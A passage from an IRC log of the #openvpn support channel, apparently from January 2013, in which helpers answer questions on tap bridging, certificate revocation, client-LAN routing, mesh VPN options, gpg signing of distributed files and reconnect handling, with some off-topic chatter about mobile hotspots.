have much more info for you as I don't work with PKCS11 myself very often. As I mentioned a number of days when you last asked, your pkcs11 provider appears to need features not present in a standard openssl build that OpenVPN provides 07:24 <+pekster> You either need to figure out what change needs to happen and build it yourself, or rebuild OpenVPN against the modified OpenSSL library 07:25 < dioz> i know server-bridge by itself is for dhcp 07:25 <+pekster> I'm not the guy to ask to debug software I haven't used and don't have the source to. The error message you get is very generic, and the fact that openvpn crashes with a different dll is not a surprise; you can't just swap out compiled shared-object files like that; you need to rebuild them from *source* for this to work 07:29 < dioz> if i'm making a tap0 bridge server-bridge nogw 07:29 < dioz> `client' is windows 7 07:29 < dioz> how do i get the client to get my bridge side WAN address 07:29 < dioz> if that makes sense 07:29 < dioz> ip-forwarding is enabled 07:30 < dioz> the WAN side address is static (no dhcp) 07:30 <+pekster> huh? 07:30 -!- folivora_ is now known as folivora 07:31 <+pekster> You want your VPN clien to get, from dhcp, an address assigned to your upstream device? You can't do that... 07:31 < dioz> yeah, vps in another AS has multiple ip addresses 07:32 < dioz> i want those ip addresses routed to machines i have in a lan 07:32 < dioz> `routed' for lack of a better term 07:32 -!- blackmagic [~black@ip98-185-21-138.rn.hr.cox.net] has joined #openvpn 07:33 < dioz> or am i high on crack or something? 07:33 <+pekster> Then bridge a tap device on the system that is assigned those addresses 07:33 < dioz> yeah i have brctl addif br0 eth0 tap0 07:34 < dioz> tap0 is made by the openvpn.config (right now i have to manually brctl addif br0 eth0 tap0 after openvpn runs for them to `show' as bridged 07:35 <+pekster> Okay. Nothing wrong with that, but if you don't use DHCP you'll need to statically set the IP on your clients, as well as your gateway if you plan to route through that interface 07:37 <+pekster> The client won't "get" your br0 address, but the device will be on the same L2 network 07:37 <+pekster> ie: your client still needs its *own* address to do anything useful 07:38 < dioz> so... idkf about windows, but i seen on install that it added a TAP-Win32 device to my "Control Panel > Netowkring and Sharing > Networking connections" 07:38 < dioz> should i see that "connect"? 07:38 <+pekster> Yup, and it needs an IP to do anything interesting 07:39 <+pekster> You can manage that by DHCP, but if you don't have it you need to assign it an IP, perhaps with an 'ifconfig' locally in the client-side, or 'ifconfig-push' server-side 07:39 <+pekster> Same for a gateway, and DNS if you need it 07:39 <+pekster> Think of tap like an ethernet cable; you can't just plug a cable in, but you need to somehow give your device an IP so it can use the connection 07:40 < dioz> one last thing... does "Local Area Connection 2" sound like a reasonable `dev-node' for a client side windows 7 config? 07:40 <+pekster> Yup 07:40 -!- ade_b [~Ade@95.209.55.220.bredband.tre.se] has joined #openvpn 07:40 -!- ade_b [~Ade@95.209.55.220.bredband.tre.se] has quit [Changing host] 07:40 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 07:40 <+pekster> You can also rename it to "tap0" or "vpn0" or whatever you like 07:40 <+pekster> Windows has stupid device names ;) 07:41 < dioz> alright thanks 07:47 -!- M-Technic [~voltron@c-67-188-136-26.hsd1.ca.comcast.net] has quit [Ping timeout: 264 seconds] 07:54 -!- M-Technic [~voltron@c-67-188-136-26.hsd1.ca.comcast.net] has joined #openvpn 07:58 -!- dazo_afk is now known as dazo 08:03 <@ecrist> good morning, kids 08:11 < igor__> can i ask a tun/tap related question? 08:11 <@ecrist> !ask 08:11 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc 08:12 < igor__> do i have to use tap for ifenslave 08:16 < plaisthos> like with any other ethernet device 08:17 < igor__> ok i am beginner 08:17 <@ecrist> what is ifenslave? 08:17 < igor__> bonding 08:18 < igor__> i want use bonding and openvpn 08:19 <+pekster> igor__: You need tap then; the ifenslave manpage is very specific that it works on the Ethernet level, which is what tap is. tun is at the Network (L3) layer 08:20 < igor__> so i have to use ethernet-bridge 08:43 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [] 08:59 -!- brute11k1 [~brute11k@89.249.235.236] has joined #openvpn 09:00 -!- zeeshoem [~zee@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 09:00 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 09:02 -!- pnielsen_ [pnielsen@2a01:7e00::f03c:91ff:fedf:3a21] has joined #openvpn 09:03 -!- nand` [~nand@static.102.126.46.78.clients.your-server.de] has joined #openvpn 09:03 -!- igor___ [~igor@pd907e599.dip0.t-ipconnect.de] has joined #openvpn 09:03 -!- Fiouz [~Fiouz@2a01:e0b:1:68:240:63ff:fee6:924b] has quit [Disconnected by services] 09:03 -!- Fiouz_ [~Fiouz@2a01:e0b:1:68:240:63ff:fee6:924b] has joined #openvpn 09:06 -!- Thermi_ [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has joined #openvpn 09:06 -!- [fred]_ [fred@konfuzi.us] has joined #openvpn 09:06 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 09:07 -!- Netsplit *.net <-> *.split quits: igor__, pnielsen, Guest70136, nutron, mnathani, [fred], Thermi, swiftkey, `nand`, kirin`, (+4 more, use /NETSPLIT to show all of them) 09:08 -!- pnielsen_ is now known as pnielsen 09:08 -!- Netsplit over, joins: BtbN 09:10 -!- defswork [~andy@141.0.50.105] has joined #openvpn 09:10 -!- swiftkey [swiftkey@2a01:7e00::f03c:91ff:feae:714e] has joined #openvpn 09:11 -!- swiftkey [swiftkey@2a01:7e00::f03c:91ff:feae:714e] has quit [Changing host] 09:11 -!- swiftkey [swiftkey@unaffiliated/swiftkey] has joined #openvpn 09:11 -!- TypoNe [~itsme@195.197.184.87] has joined #openvpn 09:11 -!- Netsplit *.net <-> *.split quits: swiftkey 09:11 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 09:12 -!- Netsplit over, joins: swiftkey 09:15 -!- kirin` [telex@gateway/shell/anapnea.net/x-ilsmwstpkjvdgbnu] has joined #openvpn 09:20 -!- kirin` [telex@gateway/shell/anapnea.net/x-ilsmwstpkjvdgbnu] has quit [Ping timeout: 240 seconds] 09:22 -!- NChief [tomme@unaffiliated/nchief] has quit [Quit: leaving] 09:22 -!- kirin` [telex@gateway/shell/anapnea.net/x-elbljsabsqbscuxz] has joined #openvpn 09:22 -!- NChief [tomme@unaffiliated/nchief] has joined #openvpn 09:24 -!- NChief [tomme@unaffiliated/nchief] has quit [Client Quit] 09:25 -!- NChief [tomme@unaffiliated/nchief] has joined #openvpn 09:26 -!- mndo [~mndo@bl15-215-4.dsl.telepac.pt] has joined #openvpn 09:28 -!- kirin` [telex@gateway/shell/anapnea.net/x-elbljsabsqbscuxz] has quit [Ping timeout: 252 seconds] 09:28 < mndo> hi 09:28 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has joined #openvpn 09:29 -!- kirin` [telex@gateway/shell/anapnea.net/x-eflzkseusdanowsk] has joined #openvpn 09:29 < mndo> is it possible to revoke several clients using crl-verify crl.pem ? 09:31 -!- Assid [~kvirc@unaffiliated/assid] has joined #openvpn 09:34 -!- kirin` [telex@gateway/shell/anapnea.net/x-eflzkseusdanowsk] has quit [Ping timeout: 248 seconds] 09:36 -!- kirin` [telex@gateway/shell/anapnea.net/x-jtuxtqhqsbqanuqk] has joined #openvpn 09:40 -!- gladiatr [~sdspence@24.124.15.166] has joined #openvpn 09:40 -!- gladiatr [~sdspence@24.124.15.166] has quit [Changing host] 09:40 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn 09:41 -!- kirin` [telex@gateway/shell/anapnea.net/x-jtuxtqhqsbqanuqk] has quit [Ping timeout: 255 seconds] 09:42 -!- kirin` [telex@gateway/shell/anapnea.net/x-vloxwmtujngywbmh] has joined #openvpn 09:44 < mndo> hi, is it possible to revoke several clients? 09:45 -!- igor___ [~igor@pd907e599.dip0.t-ipconnect.de] has quit [Quit: Lost terminal] 09:47 -!- kirin` [telex@gateway/shell/anapnea.net/x-vloxwmtujngywbmh] has quit [Ping timeout: 264 seconds] 09:49 -!- kirin` [telex@gateway/shell/anapnea.net/x-pkcemxmoxnqxpyji] has joined #openvpn 09:49 < gladiatr> if you are using certificates and your server has access to your CA crl... 09:51 <+pekster> mndo: Certificate revocation can be performed the traditional way by revoking from your PKI (easy-rsa has a "revoke-full" script, or use another method if you manage your own PKI.) Optionally, you can "temporarily" disable a user based on CN by using a ccd file with the "disable" directive in that file 09:52 <+pekster> The ccd method, or an equivelent via a --connect script should be a temporary solution only where the certificate may later be re-authorized or similar. If the key material has been compromised, you should properly revoke the certificate and update the CRL 09:53 < mndo> pekster, the file crl.pem used on crl-verify is updated with all the revoked clients everytime it is generated by revoke-full? 09:54 -!- kirin` [telex@gateway/shell/anapnea.net/x-pkcemxmoxnqxpyji] has quit [Ping timeout: 248 seconds] 09:54 <+pekster> mndo: Yup. So copy that crl.pem file to your server and it'll pick up on the change (provided you're already using the --verify-crl option. If not, you'd need to restart the instance to add that directive) 09:55 -!- kirin` [telex@gateway/shell/anapnea.net/x-inomorqwzrpnrdqv] has joined #openvpn 09:56 <+pekster> Technically you can do silly things like manually hack your index.txt file to "un-revoke" a certificate, but you really shoudln't do that as revocation is not supposed to be an operation you can undo 09:56 < mndo> pekster, oh, good my doubt was related with the crl.pem contents.. 09:56 <+pekster> You can dump the crl manually if you want to see all the serial numbers you've revoked 09:57 <+pekster> The CRL is basically just a list of all revoked certs by serial, CA association, and the date/time of each revocation along with a signature from the CA 09:57 < gladiatr> you can cross-reference the serial of the target cert between the CA's index file and the contents of the crl 09:57 < gladiatr> oh. yeah. what pekster said :) 09:58 -!- PlasmaHH [~plasmahh@213.61.9.75] has joined #openvpn 09:59 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 10:00 < mndo> pekster, great, thank you for you help 10:00 < PlasmaHH> hi, I just set up some openvpn, and while both computers can ping themselves just fine on their tun0 interface, when I try to ping a host from the clients subnet, using ping on the server, I can see how over the vpn some encrypted data is sent to the client, but nothing arrives on the tun0 there. where would I start debugging this? 10:00 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds] 10:01 -!- kirin` [telex@gateway/shell/anapnea.net/x-inomorqwzrpnrdqv] has quit [Ping timeout: 246 seconds] 10:03 -!- kirin` [telex@gateway/shell/anapnea.net/x-ejkvabzbfigdmmch] has joined #openvpn 10:03 <+pekster> !clientlan 10:03 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route 10:03 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 10:04 -!- Eduard_Munteanu [~Eduard_Mu@188.25.7.99] has joined #openvpn 10:05 < Eduard_Munteanu> Hi. Is there any support for mesh/p2p VPNs in openvpn? Or some patch / some other project I should look at? 10:06 <+pekster> Eduard_Munteanu: No mesh support at present (where you have a many to many configuration.) You can do PtP-style VPNs on OSs that support it though 10:07 <+pekster> There was some project that basically automated the creation of a bunch of PtP tunnels to emulate a mesh design, although I'm forgetting what that was called now 10:07 < Eduard_Munteanu> pekster: well, that's a lot of tunnels for 25-30 machines :) 10:08 <+pekster> Sure, although if they're mostly idle the resource reqs would be somewhat low (just ugly as far as 30 tun devices went...) 10:08 <+pekster> !mesh 10:08 <@vpnHelper> "mesh" is (#1) openvpn does not do mesh networking or (#2) see !rip or (#3) check out http://github.com/darkpixel/openmesher/ for auto-creating openvpn meshes 10:08 < mndo> pekster, maybe peervpn? 10:08 -!- kirin` [telex@gateway/shell/anapnea.net/x-ejkvabzbfigdmmch] has quit [Ping timeout: 276 seconds] 10:08 < Eduard_Munteanu> I was just looking at peervpn, though it seems it's shared-key. 10:08 <+pekster> It would be cool to have a 'mesh' topology where an extra field is added to encrypted data to handle >1 peer 10:10 -!- kirin` [telex@gateway/shell/anapnea.net/x-hannadrtnndmmtdm] has joined #openvpn 10:11 < Eduard_Munteanu> Grr, openmesher also seems shared key-only. 10:11 < Eduard_Munteanu> !rip 10:11 <@vpnHelper> "rip" is http://www.secure-computing.net/wiki/index.php/OpenVPN/RIPRouting for a writeup on using RIP in openvpn 10:13 <+pekster> Eduard_Munteanu: I'm somewhat curious what your usecase is where you need a true mesh of ~30 nodes; at 870 "direct" links, that's quite the setup 10:14 <+pekster> I'm not downplaying the usefulness of a mesh for such setups, just interested to know what types of projects folks are considering using them for 10:15 < Eduard_Munteanu> pekster: I'm using bittorrent to distribute files from a central server (unreliable bandwidth) to 30 machines, and I figured delegating encryption and security to openvpn might be a good idea. 10:15 -!- kirin` [telex@gateway/shell/anapnea.net/x-hannadrtnndmmtdm] has quit [Ping timeout: 252 seconds] 10:16 < Eduard_Munteanu> Especially since I already run a PKI for other purposes. 10:16 <+pekster> Interesting, so you'd like the gaurenteed authencitity in such a setup, where presumably access to the tracker and network gives proof of identity 10:16 -!- kirin` [telex@gateway/shell/anapnea.net/x-mudnmykgtjucinir] has joined #openvpn 10:17 <+pekster> I wonder if using gpg at each end and letting bittorrent do its thing would be a simpler solution in terms of setup and maintenance if you really require encryption and/or proof-of-origin 10:19 < Eduard_Munteanu> pekster: well, currently I am transferring the torrent files through rsync/ssh... I figured this might simplify security, if only openvpn supported it out of the box. 10:20 < Eduard_Munteanu> I could simply run a rsync server on that (TAP ?) interface, and pretend everything is alright. 10:20 <+pekster> No need for tap unless you're dealing with an Ethernet-level protocol (ARP, IPX, mutlicast, etc) 10:20 < Eduard_Munteanu> I wonder what it takes to implement it, though, I should have a look. 10:21 <+pekster> rsync is still one-to-one in terms of connectivity 10:21 <+pekster> Bittorrent is helpful in a distributed sense, and you're of course free to prepare a .torrent that shares a signed or encrypted gpg file between peers, then each client of your central server just decrypts it after download is complete 10:22 -!- kirin` [telex@gateway/shell/anapnea.net/x-mudnmykgtjucinir] has quit [Read error: Connection reset by peer] 10:22 -!- master_of_master [~master_of@p57B55DD0.dip.t-dialin.net] has quit [Ping timeout: 272 seconds] 10:23 < Eduard_Munteanu> Hm, yes, I guess that works too. I've also looked at some builtin encryption in rtorrent, but dunno how the key exchange actually works :/ 10:23 <+pekster> If you just need proof that the file hasn't been tampered with between the central server and your nodes, a detached signature is a far cleaner option so you don't even need to decrypt anything 10:23 < Eduard_Munteanu> Oh, definietly. In fact, I guess the torrent files are ok for that purpose no? 10:23 -!- master_of_master [~master_of@p57B55F39.dip.t-dialin.net] has joined #openvpn 10:24 * Eduard_Munteanu looks what hashes they use 10:24 <+pekster> Well, what is it you want at a high level? Do you just need to verify the file as the same on download as it was from the source? If so, gpg detached signatures are definitly what you want (and what Linux distros using torrents today already use) 10:25 < Eduard_Munteanu> Hm, SHA-1 according to wikipedia, looks reasonably fine. The files are just movies, btw. 10:25 <+pekster> eg: look at this link, where the chekcums are signed: http://cdimage.ubuntu.com/xubuntu/releases/12.10/release/ 10:25 <@vpnHelper> Title: Xubuntu 12.10 (Quantal Quetzal) (at cdimage.ubuntu.com) 10:25 -!- kirin` [telex@gateway/shell/anapnea.net/x-wbhuhodavdvolbuq] has joined #openvpn 10:25 <+pekster> So you download the content in the "clear" (possibly with bittorrent's rc4 "encryption" if you call it that between peers) and then checksum it, then verify that the checksums file was authentic by verifying the gpg signature 10:26 <+pekster> If your checksums match and the checksum file was correctly signed with a signature you trust, you know it hasn't been tampered with since it was hashed/signed at the server's end 10:27 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 256 seconds] 10:28 < Eduard_Munteanu> pekster: yeah, I suppose that should do. I mostly wanted encryption and all that because it's cheap these days :) 10:29 <+pekster> No real need for that unless you can't have your content (ie: the chunks going over the wire) in the clear. The solution to that without a true mesh setup would be to use gpg to encrypt the files before you seed them in the p2p swarm 10:29 <+pekster> signing and encryption are separate operations in gpg 10:29 <+pekster> You can use one, the other, or both 10:30 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 10:30 -!- kirin` [telex@gateway/shell/anapnea.net/x-wbhuhodavdvolbuq] has quit [Ping timeout: 244 seconds] 10:31 <+pekster> A mesh is an interesting solution for your needs, I just think it's overly complicated for what you ultimately want 10:31 -!- kirin` [telex@gateway/shell/anapnea.net/x-uvulotxunalwtwsa] has joined #openvpn 10:32 <+pekster> And it still won't help you if one of your nodes is somehow compromised into sending bad data to other peers (that probably wouldn't pass the .torrent files own hashing scheme, but it's not as cryptographically secure as gpg signatures are) 10:32 < Eduard_Munteanu> Might take a shot at implementing it, it simplifies things greatly if I can just rely on openvpn instead of adhoc solutions (however straightforward they may be). 10:32 <+pekster> So it's both more complex, and less useful to you in terms of verifying file origin 10:33 < Eduard_Munteanu> BTW, does openvpn distribute the server certificate to the clients? 10:34 < Eduard_Munteanu> AFAICT, you'd only need the CA cert on the client to verify it. 10:34 <+pekster> Certs from each end are exchanged during the initial TLS handshake 10:34 <+pekster> Right, you don't ever need your peer's certificate available locally as it comes over the wire from the peer itself 10:35 <+pekster> Just the ca.crt, and your own cn.crt and cn.key files (you can put them in a .p12 if you prefer, or just name all 3 in your config file) 10:35 <+pekster> There are nice howto docs on setting up a server to handle multiple clients: 10:35 <+pekster> !howto 10:35 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 10:36 < Eduard_Munteanu> Yeah, I already have such a server set up. 10:37 <+pekster> FYI, gpg sigs can use any of the hashes you see in 'gpg --version' 10:37 <+pekster> Mine supports up to SHA512 (no sha3 yet, but that's new enough not to be in most mainstream projects) 10:38 < Eduard_Munteanu> Yeah, I'm a bit uneasy about SHA1 too, most PKI stuff still uses that. :( 10:38 <+pekster> Only if you tell it 10:38 <+pekster> openssl defaults to sha1, but all my PKI certs (ca and all peers) are signged using at least SHA256 10:38 <+pekster> easy-rsa doesn't default to that, but it's easy to adjust the openssl.cnf file to do it (see default_md options, and you may need to add that yourself in the [req] section 10:41 < Eduard_Munteanu> AFAICT there's only one big piece missing... some sort of peer discovery. I guess the rest is pretty much already handled in openvpn. 10:42 < kjs> I have an issue, other people VPN'ing can access a specific subnet but I can't - I assume this a route problem from my client? 10:42 <+pekster> kjs: Other people using the same VPN? If so, then it's obviously on your side. Are the routes getting added, and have you verified you don't have overlapping networks that cause the access issue? 10:44 < kjs> I can't see the route I attempted to add it by hand. But still no joy 10:44 < Eduard_Munteanu> Maybe the server is denying you access / not forwarding traffic? 10:44 < Eduard_Munteanu> Do you admin the server as well? 10:45 <+pekster> kjs: It's possible the server treats specific users differently via ccd or --client-connect scripting handling routes/firewalling uniquely per client; do you know if that's the case? Check your logs at 'verb 5' to see exactly what the client is getting pushed and check for errors. Post logs if you need help parsing them, but it should be pretty clear from the logs re: pushed options/routes 10:46 < kjs> pekster: fixed it, was route issue i readded it manually.. .and it works now 10:46 < kjs> thanks :D 10:46 < Eduard_Munteanu> Mm, you shouldn't have to, though. 10:47 <+pekster> Not if it's being pushed correctly and didn't give an error when adding it on VPN init 10:47 <+pekster> Presumably it's not a policy problem or the admin should have firewalled it properly :P 10:47 <+pekster> (and yes, I've set up VPN accounts for contractors before where I'm quite careful to limit them to what their in-house management says they should have access too ;) 10:48 < kjs> it's not in the server config, I suspect because it's the management subnet 10:48 < kjs> and they don't want other people accessing it (directly) 10:48 <+pekster> Ah, sure. We went through a phase where our management subnet (outside of our /16 supernet for all other corp stuff) wasn't pushed, and we eventually pushed the smaller network to VPN clients. Or maybe just our IT team, I forget 10:49 <+pekster> Keep in mind not pushing a route doesn't keep people off it who know how to add routes themselves ;) 10:49 <+pekster> That's the job of a firewall 10:49 <+pekster> -A FORWARD -i tun+ -j ACCEPT is a popular netfilter rule, but often bad in a corp environment :P 10:50 -!- brute11k1 [~brute11k@89.249.235.236] has quit [Ping timeout: 264 seconds] 10:50 -!- brute11k [~brute11k@89.249.235.236] has joined #openvpn 10:51 -!- p47 [~p47@189.134.208.202] has joined #openvpn 10:51 < PlasmaHH> pekster: thanks, that diagram helped somewhat, although "correctly configure the iroute" should have somehow mentioned that the filename needs to be the client name as shown in e.g. the ifconfig-pool-persist file, and not as in the CN from the certificate (which is how I read http://openvpn.net/index.php/open-source/documentation/howto.html) 10:51 <@vpnHelper> Title: HOWTO (at openvpn.net) 10:51 <+pekster> PlasmaHH: It does need to match the CN from the X509 cert 10:52 <+pekster> (unless you're using --username-as-cn, but then you should know what that's doing anyway) 10:53 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 10:53 -!- mode/#openvpn [+o krzee] by ChanServ 10:53 <+pekster> Mind you that DN and CN are unique and shouldn't be confused; OpenVPN uses the CN field of the DN of the cert to identify unique users 10:55 < PlasmaHH> well, it currently has a different filenames. anyways, I need to get home and test it from other clients there 10:55 -!- PlasmaHH [~plasmahh@213.61.9.75] has quit [] 10:57 <+pekster> Interesting; I wonder if (s)he was using weird chars OpenVPN internally remapped 10:58 <@krzee> g'day pekster 10:58 <+pekster> Morning 10:58 <@krzee> in case you were wondering, verizon's commercials were telling the truth 10:58 <@krzee> their network is really that much better 10:59 <+pekster> LTE? 10:59 <@krzee> yep 10:59 <@krzee> ive been driving around california testing 4 different mobile hotspots with my darknet voip network 10:59 <@krzee> the verizon one is much better than the others 10:59 -!- wh1p [~angus@host-2-100-148-6.as13285.net] has left #openvpn ["Leaving"] 10:59 <+hazardous> krzee that's so weird 10:59 <+hazardous> how does att fare 10:59 <@krzee> it works in random places in the middle of nowhere 10:59 <+hazardous> heh 11:00 <@krzee> t-mobile and att work in major areas 11:00 <+hazardous> my tmobile hotspot 11:00 <+hazardous> worked only in sf proper 11:00 <@krzee> virgin works well when it works 11:00 <+hazardous> it dropped off literally as soon as it exited 11:00 <+hazardous> and started working in la 11:00 <@krzee> exactly 11:00 <+hazardous> also 11:00 <@krzee> but verizon worked along the entire 5 11:00 <+hazardous> tmobile does DPI 11:00 <+hazardous> and forbids tethering while roaming 11:00 <+hazardous> evne at reduced speeds 11:00 <@krzee> including much of the grapevine 11:00 <+hazardous> so even if it says there's service 11:00 <+hazardous> you still can't tether 11:00 <+hazardous> or use a hotspot properly 11:00 <@krzee> no no, these are wifi hotspots 11:00 <+hazardous> oh 11:00 <@krzee> they always tether 11:00 <+hazardous> mine was an actual one 11:01 <+hazardous> not a phone 11:01 <@krzee> oh ok 11:01 <+hazardous> iirc virgin = verizon? 11:01 <@krzee> nope 11:01 <@krzee> sprint iirc 11:01 <+hazardous> ah 11:01 <+pekster> I've used my phone's 3G (I have 4G w/ sprint, but rarely use it due to battery suckage) and I've plugged it in via NDIS/USB to an OpenWRT router that runs OpenVPN 11:01 <+hazardous> i think they use the same devices or something 11:01 -!- raidz_away is now known as raidz 11:01 <+hazardous> because the aut ospawned wifi ssid is similar 11:01 <+hazardous> and weird 11:01 <+pekster> One of these days whwen I'm the passengar on a long ride I should try to VPN in back home and do work for the trip :P 11:01 <@krzee> verizon is the only one that worked well on the road from vegas to san diego, and from la to the bay 11:02 <+hazardous> on sprint i had service at la 11:02 <+hazardous> d 11:02 <+hazardous> dropped off until SLO 11:02 <+hazardous> then a mile or two then dropped off until sf 11:02 <+pekster> I used my phone for streaming audio via 3G, and it work nearly everywhere except the CO moutains (major highways mostly) 11:03 <+hazardous> hahaha CO mountains 11:03 <+hazardous> i went through there twice last month/this month 11:03 <@krzee> im rolling around with a AC splitter, a power inverter and 2 micro-usb car adapters 11:03 <+pekster> I even got Netflix streaming in Eloy AZ (not far off thte interstate, but it is literally the middle of nowhere in the desert) 11:03 <@krzee> then my inverter has a usb plug for micro-usb 11:03 <@krzee> then i plugin my laptop and more micro-usb cables 11:03 <+pekster> Netflix on a phone is surprisingly fun to watch, especially when it's your only entertainment 11:03 <+hazardous> pekster: i had literally zero service in the co mountains as sprint 11:03 <@krzee> 4 hotspots, 2 cellphones, and a secure mobile device, all on micro-usb 11:03 <@krzee> lol 11:04 <+hazardous> is it weird that i pick up multiple hotspot service usually prepaid when i travel 11:04 <+hazardous> because i really need internet on the trip 11:04 <+pekster> krzee: I used an inverter a couple years ago to literally build a Gentoo OS from scratch in a car doing 70 mph from MN to IA. I had a headless PC, RS232 cable, my laptop, and an ext-hdd with the full gentoo source mirror 11:04 <+pekster> That PC was the router for the LAN-gaming event ;) 11:04 <@krzee> haha 11:04 <@krzee> nice 11:05 <+pekster> I finish the build and firewall just as we pull into the parking lot and plug it in. ~15 mins after we stopped I began serving the LAN full web connectivity 11:05 <+pekster> That was a fun drive 11:05 <+hazardous> i lost a can of soda today 11:05 <+pekster> I found one 11:05 <+hazardous> hah 11:05 <+pekster> Must be the world's way of keeping everything in balance 11:06 <+hazardous> pekster: it fell out of my bag 11:06 <+hazardous> and just rolled downhill 11:06 <+hazardous> for like three blocks 11:06 <+hazardous> didn't even bother chasing it 11:06 <+pekster> Hmm, not a Dr Pepper, was it? 11:06 <+hazardous> nah, red bull zero 11:06 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 276 seconds] 11:06 <+hazardous> it just rolled until it disappeared 11:06 <+hazardous> i need to start double bagging but they're 0,10 11:06 <@krzee> i had to fix a server in LA… hd died so i picked up a new one from best buy, $100 for 1tb, $80 for 320gig so i bought the 1tb, turned out my bios couldnt handle the 1tb 11:06 <@krzee> so i went back and got the 320gb lol 11:07 <+hazardous> ..hahahah what 11:07 <@krzee> had to get a new power supply as well 11:07 <@krzee> but then it turned out the shop had connections with the 1 supplier of the mobile devices i needed to buy wholesale, and gave me a great price 11:07 <+hazardous> the shop = best buy? 11:07 <@krzee> so the extra time it took ended up benefitting me, i would not have made the distribution deal otherwise 11:08 <@krzee> no, the guys who im colo'ing with 11:08 <@krzee> although i need to talk to best buy b2b as well, but dont expect a better price from them 11:08 <+hazardous> expect assfucking exclusivity contracts though 11:08 <@krzee> hells no 11:09 <+pekster> Do you get a clause that lets you stay with them exclusively iif they offer you lower prices? :P 11:09 <+hazardous> must order minimum x devices per calendar month 11:09 <+hazardous> orders must increase monthly 11:09 <+pekster> Lame 11:10 <+hazardous> probably offtopic but can anyone recommend me a place that does hosted mail properly 11:10 <+hazardous> just need 3 mailboxes and a catchall 11:11 <+hazardous> google apps not free anymore ;v; 11:12 <@krzee> screw exclusivity and rules with bestbuy 11:13 <@krzee> im using their distributor anyways with no rules 11:13 <@krzee> paying cost + 2% to my contact that has deals with them already 11:13 <@krzee> i could save the 2% but i like working with the guy and thats only like $4 / unit 11:14 <@krzee> and a layer of abstraction feels nice even when not needed at all, habit i guess lol 11:15 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 11:17 -!- Assid [~kvirc@unaffiliated/assid] has quit [Quit: KVIrc 4.2.0 Equilibrium http://www.kvirc.net/] 11:30 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has quit [Ping timeout: 244 seconds] 11:32 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 11:41 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has joined #openvpn 11:43 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 11:43 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 11:53 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 11:57 -!- thinkHell [~Hell@ks399220.kimsufi.com] has joined #openvpn 11:57 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 11:58 -!- ade_b [~Ade@kista.guest.accome.com] has joined #openvpn 11:58 -!- ade_b [~Ade@kista.guest.accome.com] has quit [Changing host] 11:58 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 12:00 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has quit [Excess Flood] 12:01 -!- thinkHell [~Hell@ks399220.kimsufi.com] has quit [Ping timeout: 272 seconds] 12:04 -!- _br_ [~bjoern_fr@static.88-198-57-152.clients.your-server.de] has joined #openvpn 12:07 -!- Orbi [~opera@anon-163-28.vpn.ipredator.se] has joined #openvpn 12:07 < Orbi> hello 12:08 < fys> Oh god fuck my life. 12:08 < fys> I knew this was going to bite me in the ass sooner or later. 12:08 < fys> I fucking knew it. 12:11 < Orbi> I have a pppoe reconnect at 4am daily 12:12 < Orbi> I wrote this cron job to kill openvpn and bring it back up 12:12 -!- sauce [sauce@unaffiliated/sauce] has quit [Read error: Operation timed out] 12:12 < Orbi> Could somenone have a look, because it's not working: 0 4 * * * root killall openvpn; sleep 20; openvpn --config /tmp/openvpncl/openvpn.conf 12:13 <+pekster> Orbi: What's wrong with using --keepalive and letting it automatically reconnect if the uplink reconnect takes it out? 12:14 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn 12:14 < Orbi> would that also work in case I get assigned a new IP? 12:14 < Orbi> I just checked my config and keepalive 10 30 is enabled 12:14 <+pekster> Orbi: Use --float on the server side, and and if anything on the client side maybe a SIGUSR1 is needed (see the manpage) 12:15 <+pekster> What is the problem client-side when your pppoe reconnect occurs? 12:15 <+pekster> With --keepalive 10 30, your client will notice no later than 30 seconds after a downed connection 12:16 < Orbi> I'm not in charge of the server side :) 12:16 < Orbi> Thu Jan 17 04:00:00 2013 us=908277 event_wait : Interrupted system call (code=4) 12:16 < Orbi> Thu Jan 17 04:00:00 2013 us=910293 TCP/UDP: Closing socket 12:16 < Orbi> Thu Jan 17 04:00:00 2013 us=910567 /sbin/route del -net 93.182.149.130 netmask 255.255.255.255 12:16 < Orbi> Thu Jan 17 04:00:00 2013 us=912009 ERROR: Linux route delete command failed: could not execute external program 12:16 < Orbi> Thu Jan 